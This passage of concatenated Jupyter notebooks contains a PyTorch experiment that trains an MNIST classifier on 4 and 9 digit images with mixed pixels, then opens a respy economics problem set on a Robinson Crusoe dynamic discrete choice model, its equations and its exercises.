label == 4:\n new_labels_4.append(label)\n new_images_4.append(images[i].numpy())\n elif label == 9:\n new_labels_9.append(label)\n new_images_9.append(images[i].numpy())", 
"_____no_output_____" ], [ "f_labels = []\nf_images = []", "_____no_output_____" ], [ "threshold_border = 0.9\nn_changes = 500\n\n\nfor k, image_4 in enumerate(new_images_4):\n if random.random() > threshold_border:\n #change image_4 adding information from new_images_9\n i = 0\n while(i < n_changes):\n j = random.randint(0,len(image_4)-1)\n image_4[j] = copy.deepcopy(new_images_9[random.randint(0,len(new_images_9)-1)][j])\n i += 1 \n f_labels.append(new_labels_4[k])\n f_images.append(torch.from_numpy(image_4))", "_____no_output_____" ] ], [ [ "How the output is like after mixing 4s with some 9 data", "_____no_output_____" ] ], [ [ "fig = plt.figure(figsize=(8,8));\ncolumns = 4;\nrows = 5;\n\nfor i in range(1, columns*rows +1):\n img_xy = np.random.randint(len(new_images_4))\n img = torch.from_numpy(new_images_4[img_xy])\n img.resize_(28,28)\n fig.add_subplot(rows, columns, i)\n plt.axis('off')\n plt.imshow(img, cmap='gray')\nplt.show()", "_____no_output_____" ], [ "threshold_border = 0.9\nn_changes = 500\n\nfor k, image_9 in enumerate(new_images_9):\n if random.random() > threshold_border:\n #change image_9 adding information from new_images_4\n i = 0\n while(i < n_changes):\n j = random.randint(0,len(image_9)-1)\n image_9[j] = copy.deepcopy(new_images_4[random.randint(0,len(new_images_4)-1)][j])\n i += 1 \n f_labels.append(new_labels_9[k])\n f_images.append(torch.from_numpy(image_9))", "_____no_output_____" ] ], [ [ "How the output is like after mixing 9s with some 4 data", "_____no_output_____" ] ], [ [ "fig = plt.figure(figsize=(8,8));\ncolumns = 4;\nrows = 5;\n\nfor i in range(1, columns*rows +1):\n img_xy = np.random.randint(len(new_images_9))\n img = torch.from_numpy(new_images_9[img_xy])\n img.resize_(28,28)\n fig.add_subplot(rows, columns, i)\n plt.axis('off')\n plt.imshow(img, cmap='gray')\nplt.show()", "_____no_output_____" ], [ "class Net(nn.Module):\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__() \n self.fc1 = 
nn.Linear(input_size, hidden_size) \n self.relu = nn.ReLU() \n \n self.fc2 = nn.Linear(hidden_size, int(hidden_size)) \n self.relu2 = nn.ReLU() \n \n self.fc4 = nn.Linear(int(hidden_size), num_classes) \n \n # Define proportion or neurons to dropout\n# self.dropout = nn.Dropout(0.2)\n \n def forward(self, x): \n \n# x = self.dropout(x)\n out = self.fc1(x)\n out = self.relu(out)\n\n# out = self.dropout(out)\n out = self.fc2(out)\n out = self.relu2(out) \n \n# out = self.dropout(out) \n out = self.fc4(out)\n return out", "_____no_output_____" ] ], [ [ "Net with mixed data", "_____no_output_____" ] ], [ [ "net3 = Net(input_size, hidden_size, num_classes)\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(net3.parameters(), lr=learning_rate)\n\nlosses = []\n\nfor epoch in range(num_epochs):\n for i in range(int(len(f_images)/batch_size)):\n idx = list(range(batch_size*i,(batch_size*(i+1))))\n images = [f_images[id] for id in idx]\n labels = [f_labels[id] for id in idx]\n \n images = torch.stack(images)\n labels = torch.stack(labels)\n\n \n optimizer.zero_grad() \n outputs = net3(images) \n \n\n\n loss = criterion(outputs, labels) \n loss.backward() \n optimizer.step() \n \n losses.append(loss.item())\n \n if (i+1) % 600 == 0: \n\n print('Epoch [%d/%d], Step [%d/%d], Loss: %.4f'\n %(epoch+1, num_epochs, i+1, len(train)//batch_size, loss.item()))\n\n acc(net3, train)\n", "Epoch [1/60], Step [600/6], Loss: 0.0528\nEpoch [1/60], Step [1200/6], Loss: 0.0109\nEpoch [1/60], Step [1800/6], Loss: 0.0091\nEpoch [1/60], Step [2400/6], Loss: 0.0026\nEpoch [1/60], Step [3000/6], Loss: 0.0005\nEpoch [1/60], Step [3600/6], Loss: 0.0048\nEpoch [1/60], Step [4200/6], Loss: 0.0014\nEpoch [1/60], Step [4800/6], Loss: 0.0070\nEpoch [1/60], Step [5400/6], Loss: 0.0062\nEpoch [1/60], Step [6000/6], Loss: 0.0025\nEpoch [1/60], Step [6600/6], Loss: 0.0010\nEpoch [1/60], Step [7200/6], Loss: 0.0009\nEpoch [1/60], Step [7800/6], Loss: 0.0001\nEpoch [1/60], Step [8400/6], Loss: 
0.0003\nEpoch [1/60], Step [9000/6], Loss: 0.0001\nEpoch [1/60], Step [9600/6], Loss: 0.0025\nEpoch [1/60], Step [10200/6], Loss: 0.0003\nEpoch [1/60], Step [10800/6], Loss: 0.0001\nEpoch [1/60], Step [11400/6], Loss: 0.0003\nEpoch [1/60], Step [12000/6], Loss: 0.0001\nEpoch [1/60], Step [12600/6], Loss: 0.0008\nEpoch [1/60], Step [13200/6], Loss: 0.0036\nEpoch [1/60], Step [13800/6], Loss: 0.0007\nEpoch [1/60], Step [14400/6], Loss: 0.0005\nEpoch [1/60], Step [15000/6], Loss: 0.0006\nEpoch [1/60], Step [15600/6], Loss: 0.0000\nEpoch [1/60], Step [16200/6], Loss: 0.0001\nEpoch [1/60], Step [16800/6], Loss: 0.0018\nEpoch [1/60], Step [17400/6], Loss: 0.0002\nEpoch [1/60], Step [18000/6], Loss: 0.0014\nEpoch [1/60], Step [18600/6], Loss: 0.0003\nEpoch [1/60], Step [19200/6], Loss: 0.0001\nEpoch [1/60], Step [19800/6], Loss: 0.0000\nEpoch [1/60], Step [20400/6], Loss: 0.0000\nEpoch [1/60], Step [21000/6], Loss: 0.1191\nEpoch [1/60], Step [21600/6], Loss: 0.0050\nEpoch [1/60], Step [22200/6], Loss: 0.0031\nEpoch [1/60], Step [22800/6], Loss: 0.0047\nEpoch [1/60], Step [23400/6], Loss: 0.0013\nEpoch [2/60], Step [600/6], Loss: 0.0144\nEpoch [2/60], Step [1200/6], Loss: 0.0064\nEpoch [2/60], Step [1800/6], Loss: 0.0055\nEpoch [2/60], Step [2400/6], Loss: 0.0021\nEpoch [2/60], Step [3000/6], Loss: 0.0005\nEpoch [2/60], Step [3600/6], Loss: 0.0038\nEpoch [2/60], Step [4200/6], Loss: 0.0011\nEpoch [2/60], Step [4800/6], Loss: 0.0052\nEpoch [2/60], Step [5400/6], Loss: 0.0042\nEpoch [2/60], Step [6000/6], Loss: 0.0020\nEpoch [2/60], Step [6600/6], Loss: 0.0008\nEpoch [2/60], Step [7200/6], Loss: 0.0007\nEpoch [2/60], Step [7800/6], Loss: 0.0001\nEpoch [2/60], Step [8400/6], Loss: 0.0003\nEpoch [2/60], Step [9000/6], Loss: 0.0001\nEpoch [2/60], Step [9600/6], Loss: 0.0021\nEpoch [2/60], Step [10200/6], Loss: 0.0003\nEpoch [2/60], Step [10800/6], Loss: 0.0001\nEpoch [2/60], Step [11400/6], Loss: 0.0003\nEpoch [2/60], Step [12000/6], Loss: 0.0001\nEpoch [2/60], Step [12600/6], 
Loss: 0.0008\nEpoch [2/60], Step [13200/6], Loss: 0.0027\nEpoch [2/60], Step [13800/6], Loss: 0.0006\nEpoch [2/60], Step [14400/6], Loss: 0.0004\nEpoch [2/60], Step [15000/6], Loss: 0.0005\nEpoch [2/60], Step [15600/6], Loss: 0.0000\nEpoch [2/60], Step [16200/6], Loss: 0.0001\nEpoch [2/60], Step [16800/6], Loss: 0.0013\nEpoch [2/60], Step [17400/6], Loss: 0.0002\nEpoch [2/60], Step [18000/6], Loss: 0.0011\nEpoch [2/60], Step [18600/6], Loss: 0.0002\nEpoch [2/60], Step [19200/6], Loss: 0.0001\nEpoch [2/60], Step [19800/6], Loss: 0.0000\nEpoch [2/60], Step [20400/6], Loss: 0.0000\nEpoch [2/60], Step [21000/6], Loss: 0.0492\nEpoch [2/60], Step [21600/6], Loss: 0.0035\nEpoch [2/60], Step [22200/6], Loss: 0.0022\nEpoch [2/60], Step [22800/6], Loss: 0.0034\nEpoch [2/60], Step [23400/6], Loss: 0.0011\nEpoch [3/60], Step [600/6], Loss: 0.0111\nEpoch [3/60], Step [1200/6], Loss: 0.0055\nEpoch [3/60], Step [1800/6], Loss: 0.0044\nEpoch [3/60], Step [2400/6], Loss: 0.0018\nEpoch [3/60], Step [3000/6], Loss: 0.0005\nEpoch [3/60], Step [3600/6], Loss: 0.0033\nEpoch [3/60], Step [4200/6], Loss: 0.0009\nEpoch [3/60], Step [4800/6], Loss: 0.0043\nEpoch [3/60], Step [5400/6], Loss: 0.0033\nEpoch [3/60], Step [6000/6], Loss: 0.0018\nEpoch [3/60], Step [6600/6], Loss: 0.0007\nEpoch [3/60], Step [7200/6], Loss: 0.0006\nEpoch [3/60], Step [7800/6], Loss: 0.0001\nEpoch [3/60], Step [8400/6], Loss: 0.0003\nEpoch [3/60], Step [9000/6], Loss: 0.0001\nEpoch [3/60], Step [9600/6], Loss: 0.0019\nEpoch [3/60], Step [10200/6], Loss: 0.0003\nEpoch [3/60], Step [10800/6], Loss: 0.0001\nEpoch [3/60], Step [11400/6], Loss: 0.0003\nEpoch [3/60], Step [12000/6], Loss: 0.0001\nEpoch [3/60], Step [12600/6], Loss: 0.0008\nEpoch [3/60], Step [13200/6], Loss: 0.0022\nEpoch [3/60], Step [13800/6], Loss: 0.0005\nEpoch [3/60], Step [14400/6], Loss: 0.0004\nEpoch [3/60], Step [15000/6], Loss: 0.0005\nEpoch [3/60], Step [15600/6], Loss: 0.0000\nEpoch [3/60], Step [16200/6], Loss: 0.0001\nEpoch [3/60], Step 
[16800/6], Loss: 0.0010\nEpoch [3/60], Step [17400/6], Loss: 0.0002\nEpoch [3/60], Step [18000/6], Loss: 0.0010\nEpoch [3/60], Step [18600/6], Loss: 0.0002\nEpoch [3/60], Step [19200/6], Loss: 0.0001\nEpoch [3/60], Step [19800/6], Loss: 0.0000\nEpoch [3/60], Step [20400/6], Loss: 0.0000\nEpoch [3/60], Step [21000/6], Loss: 0.0421\nEpoch [3/60], Step [21600/6], Loss: 0.0031\nEpoch [3/60], Step [22200/6], Loss: 0.0020\nEpoch [3/60], Step [22800/6], Loss: 0.0030\nEpoch [3/60], Step [23400/6], Loss: 0.0010\nEpoch [4/60], Step [600/6], Loss: 0.0102\nEpoch [4/60], Step [1200/6], Loss: 0.0053\nEpoch [4/60], Step [1800/6], Loss: 0.0039\nEpoch [4/60], Step [2400/6], Loss: 0.0017\nEpoch [4/60], Step [3000/6], Loss: 0.0005\nEpoch [4/60], Step [3600/6], Loss: 0.0032\nEpoch [4/60], Step [4200/6], Loss: 0.0008\nEpoch [4/60], Step [4800/6], Loss: 0.0039\nEpoch [4/60], Step [5400/6], Loss: 0.0029\nEpoch [4/60], Step [6000/6], Loss: 0.0017\nEpoch [4/60], Step [6600/6], Loss: 0.0007\nEpoch [4/60], Step [7200/6], Loss: 0.0005\nEpoch [4/60], Step [7800/6], Loss: 0.0001\nEpoch [4/60], Step [8400/6], Loss: 0.0002\nEpoch [4/60], Step [9000/6], Loss: 0.0001\nEpoch [4/60], Step [9600/6], Loss: 0.0019\nEpoch [4/60], Step [10200/6], Loss: 0.0003\nEpoch [4/60], Step [10800/6], Loss: 0.0001\nEpoch [4/60], Step [11400/6], Loss: 0.0003\nEpoch [4/60], Step [12000/6], Loss: 0.0001\nEpoch [4/60], Step [12600/6], Loss: 0.0008\nEpoch [4/60], Step [13200/6], Loss: 0.0020\nEpoch [4/60], Step [13800/6], Loss: 0.0005\nEpoch [4/60], Step [14400/6], Loss: 0.0004\nEpoch [4/60], Step [15000/6], Loss: 0.0004\nEpoch [4/60], Step [15600/6], Loss: 0.0000\nEpoch [4/60], Step [16200/6], Loss: 0.0001\nEpoch [4/60], Step [16800/6], Loss: 0.0009\nEpoch [4/60], Step [17400/6], Loss: 0.0002\nEpoch [4/60], Step [18000/6], Loss: 0.0009\nEpoch [4/60], Step [18600/6], Loss: 0.0002\nEpoch [4/60], Step [19200/6], Loss: 0.0001\nEpoch [4/60], Step [19800/6], Loss: 0.0000\nEpoch [4/60], Step [20400/6], Loss: 0.0000\nEpoch 
[4/60], Step [21000/6], Loss: 0.0396\nEpoch [4/60], Step [21600/6], Loss: 0.0030\nEpoch [4/60], Step [22200/6], Loss: 0.0018\nEpoch [4/60], Step [22800/6], Loss: 0.0027\nEpoch [4/60], Step [23400/6], Loss: 0.0010\nEpoch [5/60], Step [600/6], Loss: 0.0098\nEpoch [5/60], Step [1200/6], Loss: 0.0054\nEpoch [5/60], Step [1800/6], Loss: 0.0036\nEpoch [5/60], Step [2400/6], Loss: 0.0017\nEpoch [5/60], Step [3000/6], Loss: 0.0005\nEpoch [5/60], Step [3600/6], Loss: 0.0032\nEpoch [5/60], Step [4200/6], Loss: 0.0007\nEpoch [5/60], Step [4800/6], Loss: 0.0037\nEpoch [5/60], Step [5400/6], Loss: 0.0027\nEpoch [5/60], Step [6000/6], Loss: 0.0016\nEpoch [5/60], Step [6600/6], Loss: 0.0006\nEpoch [5/60], Step [7200/6], Loss: 0.0005\nEpoch [5/60], Step [7800/6], Loss: 0.0001\nEpoch [5/60], Step [8400/6], Loss: 0.0002\nEpoch [5/60], Step [9000/6], Loss: 0.0001\nEpoch [5/60], Step [9600/6], Loss: 0.0018\nEpoch [5/60], Step [10200/6], Loss: 0.0003\nEpoch [5/60], Step [10800/6], Loss: 0.0001\nEpoch [5/60], Step [11400/6], Loss: 0.0003\nEpoch [5/60], Step [12000/6], Loss: 0.0001\nEpoch [5/60], Step [12600/6], Loss: 0.0008\nEpoch [5/60], Step [13200/6], Loss: 0.0018\nEpoch [5/60], Step [13800/6], Loss: 0.0004\nEpoch [5/60], Step [14400/6], Loss: 0.0004\nEpoch [5/60], Step [15000/6], Loss: 0.0004\nEpoch [5/60], Step [15600/6], Loss: 0.0000\nEpoch [5/60], Step [16200/6], Loss: 0.0001\nEpoch [5/60], Step [16800/6], Loss: 0.0008\nEpoch [5/60], Step [17400/6], Loss: 0.0002\nEpoch [5/60], Step [18000/6], Loss: 0.0009\nEpoch [5/60], Step [18600/6], Loss: 0.0002\nEpoch [5/60], Step [19200/6], Loss: 0.0001\nEpoch [5/60], Step [19800/6], Loss: 0.0000\nEpoch [5/60], Step [20400/6], Loss: 0.0000\nEpoch [5/60], Step [21000/6], Loss: 0.0385\nEpoch [5/60], Step [21600/6], Loss: 0.0030\nEpoch [5/60], Step [22200/6], Loss: 0.0017\n" ], [ "acc(net3, train)", "Accuracy of the network train images: 10 %\n" ], [ "## Evaluate the model\ncorrect = 0\ntotal = 0\ni = 0\nfor images2, labels2 in test:\n \n 
images = Variable(images2.view(-1, 28*28))\n \n \n outputs = net3(images)\n _, predicted = torch.max(outputs.data, 1) \n total += labels2.size(0) \n correct += (predicted == labels2).sum() \n i += 1\n \nprint('Accuracy of the network on the 10K test images: %d %%' % (100 * correct / total))", "Accuracy of the network on the 10K test images: 10 %\n" ], [ "net2 = Net(input_size, hidden_size, num_classes)\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(net2.parameters(), lr=learning_rate)\n# optimizer = torch.optim.Adam(net3.parameters(), lr=learning_rate)\n\nlosses = []\n\nfor epoch in range(num_epochs):\n for i, (images, labels) in enumerate(train): \n images = Variable(images.view(-1, 28*28)) \n labels = Variable(labels)\n\n optimizer.zero_grad() \n outputs = net2(images) \n \n loss = criterion(outputs, labels) \n loss.backward() \n optimizer.step() \n \n losses.append(loss.item())\n \n if (i+1) % 600 == 0: \n\n print('Epoch [%d/%d], Step [%d/%d], Loss: %.4f'\n %(epoch+1, num_epochs, i+1, len(train)//batch_size, loss.item()))", "Epoch [1/60], Step [600/6], Loss: 2.2802\nEpoch [2/60], Step [600/6], Loss: 2.2480\nEpoch [3/60], Step [600/6], Loss: 2.2217\nEpoch [4/60], Step [600/6], Loss: 2.1731\nEpoch [5/60], Step [600/6], Loss: 2.1026\nEpoch [6/60], Step [600/6], Loss: 2.0168\nEpoch [7/60], Step [600/6], Loss: 1.9046\nEpoch [8/60], Step [600/6], Loss: 1.7641\nEpoch [9/60], Step [600/6], Loss: 1.5110\nEpoch [10/60], Step [600/6], Loss: 1.2992\nEpoch [11/60], Step [600/6], Loss: 1.0070\nEpoch [12/60], Step [600/6], Loss: 0.9867\nEpoch [13/60], Step [600/6], Loss: 0.7954\nEpoch [14/60], Step [600/6], Loss: 0.7992\nEpoch [15/60], Step [600/6], Loss: 0.7754\nEpoch [16/60], Step [600/6], Loss: 0.6703\nEpoch [17/60], Step [600/6], Loss: 0.7269\nEpoch [18/60], Step [600/6], Loss: 0.6204\nEpoch [19/60], Step [600/6], Loss: 0.5545\nEpoch [20/60], Step [600/6], Loss: 0.4842\nEpoch [21/60], Step [600/6], Loss: 0.5564\nEpoch [22/60], Step [600/6], Loss: 
0.5936\nEpoch [23/60], Step [600/6], Loss: 0.4120\nEpoch [24/60], Step [600/6], Loss: 0.4483\nEpoch [25/60], Step [600/6], Loss: 0.5071\nEpoch [26/60], Step [600/6], Loss: 0.4077\nEpoch [27/60], Step [600/6], Loss: 0.3829\nEpoch [28/60], Step [600/6], Loss: 0.4368\nEpoch [29/60], Step [600/6], Loss: 0.5123\nEpoch [30/60], Step [600/6], Loss: 0.4163\nEpoch [31/60], Step [600/6], Loss: 0.4924\nEpoch [32/60], Step [600/6], Loss: 0.4044\nEpoch [33/60], Step [600/6], Loss: 0.4085\nEpoch [34/60], Step [600/6], Loss: 0.3780\nEpoch [35/60], Step [600/6], Loss: 0.3415\nEpoch [36/60], Step [600/6], Loss: 0.3895\nEpoch [37/60], Step [600/6], Loss: 0.5168\nEpoch [38/60], Step [600/6], Loss: 0.4380\nEpoch [39/60], Step [600/6], Loss: 0.4083\nEpoch [40/60], Step [600/6], Loss: 0.3747\nEpoch [41/60], Step [600/6], Loss: 0.3367\nEpoch [42/60], Step [600/6], Loss: 0.4946\nEpoch [43/60], Step [600/6], Loss: 0.3071\nEpoch [44/60], Step [600/6], Loss: 0.2328\nEpoch [45/60], Step [600/6], Loss: 0.2457\nEpoch [46/60], Step [600/6], Loss: 0.3495\nEpoch [47/60], Step [600/6], Loss: 0.2415\nEpoch [48/60], Step [600/6], Loss: 0.4515\nEpoch [49/60], Step [600/6], Loss: 0.3182\nEpoch [50/60], Step [600/6], Loss: 0.2965\nEpoch [51/60], Step [600/6], Loss: 0.2352\nEpoch [52/60], Step [600/6], Loss: 0.3287\nEpoch [53/60], Step [600/6], Loss: 0.3073\nEpoch [54/60], Step [600/6], Loss: 0.3863\nEpoch [55/60], Step [600/6], Loss: 0.3859\nEpoch [56/60], Step [600/6], Loss: 0.3927\nEpoch [57/60], Step [600/6], Loss: 0.2850\nEpoch [58/60], Step [600/6], Loss: 0.3616\nEpoch [59/60], Step [600/6], Loss: 0.3419\nEpoch [60/60], Step [600/6], Loss: 0.4538\n" ], [ "acc(net2, train)", "Accuracy of the network train images: 91 %\n" ], [ "## Evaluate the model\ncorrect = 0\ntotal = 0\ni = 0\nfor images2, labels2 in test:\n \n images = Variable(images2.view(-1, 28*28))\n \n \n outputs = net2(images)\n _, predicted = torch.max(outputs.data, 1) \n total += labels2.size(0) \n correct += (predicted == labels2).sum() 
\n i += 1\n \nprint('Accuracy of the network on the 10K test images: %d %%' % (100 * correct / total))", "Accuracy of the network on the 10K test images: 91 %\n" ] ], [ [ "#### ", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ] ]
e7301eff6d0fd98cdd232b9498f60b95a9db5b71
19,659
ipynb
Jupyter Notebook
respy-problem-set.ipynb
amageh/respy-tut
115a8a3cf0069b03ee18c6eac70b0b9b1cba6857
[ "MIT" ]
null
null
null
respy-problem-set.ipynb
amageh/respy-tut
115a8a3cf0069b03ee18c6eac70b0b9b1cba6857
[ "MIT" ]
null
null
null
respy-problem-set.ipynb
amageh/respy-tut
115a8a3cf0069b03ee18c6eac70b0b9b1cba6857
[ "MIT" ]
null
null
null
56.168571
731
0.666565
[ [ [ "## Problem Set - Dynamic life-cycle models of human capital accumulation with respy\n\nIn this problem set, we will work with Eckstein-Keane-Wolpin (EKW) models, a class of dynamic discrete choice models that are used to address economic questions in the realm of labor and education economics. Prominent examples of such models in economic research are Keane and Wolpin (1994, 1997, 2000) and more recently Blundell et al. (2016), Adda et al. (2017), and Eckstein et al. (2019). For the problem set, we will be working with a toy model that follows the famous story of Robinson Crusoe who is stranded on a deserted island. Our version of this story focuses on his work and leisure decisions during the time on the island, specifically the human capital he accumulates as he engages in productive activities. \n\nWe will be using the Python package [respy](https://respy.readthedocs.io) to implement and analyze the economic model. Below, you find a summary of the economic framework of the problem set. For a detailed description of this specific model, please refer to the [introductory tutorial](https://respy.readthedocs.io/en/latest/tutorials/robinson_crusoe.html) in the **respy** documentation. An extended outline of EKW models using the example of the seminal model presented in Keane and Wolpin (1997) can be found in the [explanations](https://respy.readthedocs.io/en/latest/explanations/index.html) section of the documentation. \n\nThe problem set consists of four exercises. In the first exercise you are asked to examine the simulated data in detail and identify components that make up the rewards in the model. The second exercise explores the modeling and policy evaluation capabilities of **respy** in the context of the intertemporal trade-off that Robinson is facing. The third exercise focuses on the discrete choice dynamic programming problem that lies at the heart of the structural model to explore the trade-off between computation time and model components. 
Lastly, the fourth exercise explores the numerical integration of the expected value functions to illustrate numerical components of model implementation.", "_____no_output_____" ] ], [ [ "import timeit\nimport respy as rp\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt", "_____no_output_____" ] ], [ [ "## Economic Setting: Robinson Crusoe on an island\n\n- Robinson chooses every period $t = 0, \\dots, T$ to either go fishing, $a = 0$, or spend the day in the hammock, $a = 1$.\n\n- If Robinson chooses to go fishing, he gains one additional unit of experience in the next period. Experience starts at zero.\n\n- The utility of a choice, $U(s_t, a_t)$, depends on the state $s_t$, which contains information on the individual's characteristics, and the chosen alternative $a_t$.\n\n- Robinson's utility for any given option can be denoted by\n\n$$\\begin{align}\n U(s_t, a_t) = \\underbrace{W(s_t, a_t)}_{wage} + \\underbrace{N(s_t, a_t)}_{non-pecuniary}\n\\end{align}$$\n\n**Working alternatives**\n\n- For working alternatives like fishing, utility consists of two components, a wage and a non-pecuniary component. The wage is defined as \n\n$$\\begin{align}\n W(s_t, a_t) &= r_a \\exp\\{x^w_{at} \\beta^w_a + \\epsilon_{at}\\}\\\\\n \\ln(W(s_t, a_t)) &= \\ln(r_a) + x^w_{at} \\beta^w_a + \\epsilon_{at}\n\\end{align}$$\n\n- It consists of several components:\n - $r_a$ is a market rental price for skill units.\n - $x^w_{at}$ and $\\beta^w_a$ are the choice- and time-dependent covariates and returns related to the wage signaled by superscript $w$. \n - $\\epsilon_{at}$ is a choice-specific random shock from the shock vector $\\epsilon_t \\sim \\mathcal{N}(0, \\Sigma)$ for all choices.\n\n- The non-pecuniary rewards for working alternatives are a vector dot product of covariates $x_t^w$ and parameters $\\beta^w$. 
The superscript $w$ signals that the components belong to working alternatives.\n\n$$\\begin{align}\n N^w(s_t, a_t) = x_t^w\\beta^w_{a}\n\\end{align}$$\n\n**Non-working alternatives**\n\n- For non-working alternatives like the hammock, $W(s_t, a_t) = 0$. The non-pecuniary reward for non-working alternatives is very similar to the working alternative except that the shocks enter the equation additively. Superscript $n$ stands for non-pecuniary.\n\n$$\n N^n(s_t, a_t) = x_t^n\\beta^n_{a} + \\epsilon_{at}\n$$\n\n\n- Robinson's choice set thus consists of a \"working\" alternative which awards him a pecuniary compensation or wage and a \"leisure\" or non-working alternative which he derives a utility from, but no experience or wage. Experience in this basic model starts at zero and increases by one for every period $t$ in $1, ..., T$ where he chooses to go fishing. \n\n\n**Robinson's choice problem**\n\n- During his time on the island, Robinson has to make choices about which actions to take. The general assumption is that Robinson is forward-looking and maximizes the expected present value of utility over the remaining lifetime which is achieved by selecting the optimal sequence of choices $\\{a_t\\}^T_{t = 0}$.\n\n\n- Robinson's decision problem can be expressed as a Bellman equation where the value of a given state consists of the current and future state values associated with it. \n\n$$\\begin{align}\n V(s_{t})&= \\max_{a_t} \\, \\{\\underbrace{U(s_t, a_t)}_{\\text{flow utility}}+ \\delta \\underbrace{\\text{E}[ V(s_{t+1})]\\}}_{\\text{continuation value}}\n\\end{align}$$\n\n- For each period, the value of a given choice consists of its flow utility and its continuation value. Since the realization of shocks becomes known in each period before Robinson makes his choice, the flow utility can be extracted from the expectation operator. 
As shocks in period $t + 1$ are unknown to the individual in period $t$, utility must be maximized given the joint distribution of shocks in period $t + 1$ which is a maximization problem over a two-dimensional integral. Denote the non-stochastic part of a state as $s^-$. Then, Robinson maximizes\n\n$$\\begin{equation}\n V(s_t) = \\max_{a_t}\\{\n U(s_t, a_t) + \\delta \\int_{\\epsilon_{1, t + 1}} \\int_{\\epsilon_{0, t + 1}}\n \\max_{a_{t + 1}} V_{a_{t + 1}}(s^-_{t + 1}, \\epsilon_{t + 1})\n f_\\epsilon(\\epsilon_{t + 1})\n d_{\\epsilon_{0, t + 1}}, d_{\\epsilon_{1, t + 1}}\n \\}\n\\end{equation}$$", "_____no_output_____" ], [ "### Setup: Loading the model\n\nLoad the example model `robinson_crusoe_basic` into memory using the function `get_example_model` by executing the cell below. The function returns a DataFrame of `params` which contains the model parameters, the dictionary `options` holding model options, and a set of simulated data.", "_____no_output_____" ] ], [ [ "params, options, data = rp.get_example_model(\"robinson_crusoe_basic\")", "_____no_output_____" ] ], [ [ "The parameters correspond to the model equations. Since this is a very simple model, there are only 7 parameters. The table below shows the parameters that appear in the reward functions.", "_____no_output_____" ], [ "|parameter | category | name | value |\n|-----------------------|-------------------|---------------|-------|\n|$\\delta$ | **delta** | **delta** | 0.95 |\n|$\\beta^{w}_{fishing1}$ | **wage_fishing** |**exp_fishing**| 0.30 |\n|$\\beta^{w}_{fishing2}$ | **nonpec_fishing**| **constant** | -0.20 |\n|$\\beta^{n}_{hammock}$ | **nonpec_hammock**| **constant** | 2.00 |", "_____no_output_____" ], [ "Aside from the parameters, the `params` DataFrame also contains components of the shock matrix of the model. 
The parameters listed under the category `shocks_sdcorr` correspond to the lower triangular of the shock variance-covariance matrix which is a square matrix with dimensions that correspond to the number of choices of the model. We can define these shock components in different ways, but here they are defined as standard deviations (diagonal elements of the matrix) and correlations of shocks between choices (lower-triangular elements).", "_____no_output_____" ], [ "---\n\n### Exercise 1: Explore the data\n\nFamiliarize yourself with the `data` for our simple Robinson Crusoe model.\n\n1. How is the data structured? What purpose do the two index levels in the DataFrame serve?\n2. Inspect the data columns. What information is provided? How do the data columns correspond to the model equations? Where can you find Robinson's decisions and rewards?\n3. Plot the choice frequencies for each period. What proportion of Robinsons goes fishing, how many individuals choose to relax in the hammock?\n4. How much experience does Robinson accumulate over time? Plot the frequencies of experience levels for each period.\n\n*Hint: You can use the pandas functions [pandas.DataFrame.groupby](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.groupby.html) and [pandas.Series.value_counts](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.value_counts.html) to compute the quantities of interest.*", "_____no_output_____" ], [ "---", "_____no_output_____" ], [ "### Exercise 2: Model mechanisms and economic analysis\n\nNow that we have familiarized ourselves with the data, we can analyze Robinson's choices in more detail. In our dynamic model, Robinson is forward-looking and thus takes future states into account when making his decisions.\n\n1. For now, focus on Robinson in the first period captured in the `data`. How would his choices change if he only took his current period utility (i.e. 
the **flow utility of period 0**) into account and ignored future rewards? Compute the choice frequencies for this scenario and compare them to his actual choices. \n\n2. Let's assess the choices of a myopic Robinson over all time periods. **Edit the parameter vector** accordingly and **simulate** data for this scenario. How do Robinson's choices now compare to the baseline scenario? What happens if Robinson values future rewards exactly the same as current period rewards?\n\n3. We can also imagine a technology shock that augments Robinson's return to experience in fishing. Let's assume the shock increases his return by **10%**. Implement the technology shock and simulate data to compare Robinson's choices against the baseline scenario. Which part of Robinson's utility is affected by this adjustment? Can you think of real world examples for policy interventions which we could simulate with a model like this? ", "_____no_output_____" ], [ "---\n\n### Exercise 3: Model computation time\n\nAn important aspect of structural econometric models like the one assessed in this problem set is the discrete choice dynamic programming (DCDP) problem which lies at the heart of the model. With increasing model components like choices, individual characteristics, and time periods the computational complexity of this problem increases as the potential states (state space) that have to be considered to determine Robinson's optimal choice path grows. In this exercise we will thus inspect the state space and computation time of the model in more detail. A **respy**'s model can be solved in two steps:\n\n```\nsolve = rp.get_solve_func(params, options)\nstate_space = solve(params)\n\n```\n\nThe first step constructs the state space for the model. In the second step, the DCDP problem is solved for a given parameter vector. **respy** utilizes two-step approaches like this for many functions to facilitate usage and cut down on computation time. 
In the following we assess how different modeling components affect the solution time of the model.\n\n1. One impotant such component are the number of periods considered in a model. Solve the `robinson_crusoe_basic` model for **different numbers of periods in the model** (maximum of 30-40) and log the solution time. Repeat the exercise 10 times for each number of periods and plot the mean solve time to compare how to solution time increases with the number of periods considered in the model. **Note that you only need to time the second step ```state_space = solve(params)``` shown above**.\n\n2. Let's now compare the solution time of **multiple models**. Assess the solution time of the models `robinson_crusoe_basic`,`robinson_crusoe_extended`, `kw_94_one`, and `kw_97_basic` (if possible) which exhibit an increasing number of choices available in the model. Set the number of periods to 20 for all models to make them more comparable in regards to time horizon and analyze the results. How many choices are available in each model and how does the solution time increase? \n\n Note that there are some other components that distinguish the models than just the number of periods and available choices. Assess the `params` and `options` of the models. Which components likely also influence the solution time?\n ", "_____no_output_____" ], [ "---\n\n### Exercise 4: Numerical integration\n\nOne important component of the solution to the DCDP problem in **respy** models is numerical integration. Solving for the optimal decision sequence requires us to solve a multi-dimensional integral at every point in the state space to find the expected value functions. The integrated value function does not have an analytical solution and thus requires the application of numerical methods. \n\nThe 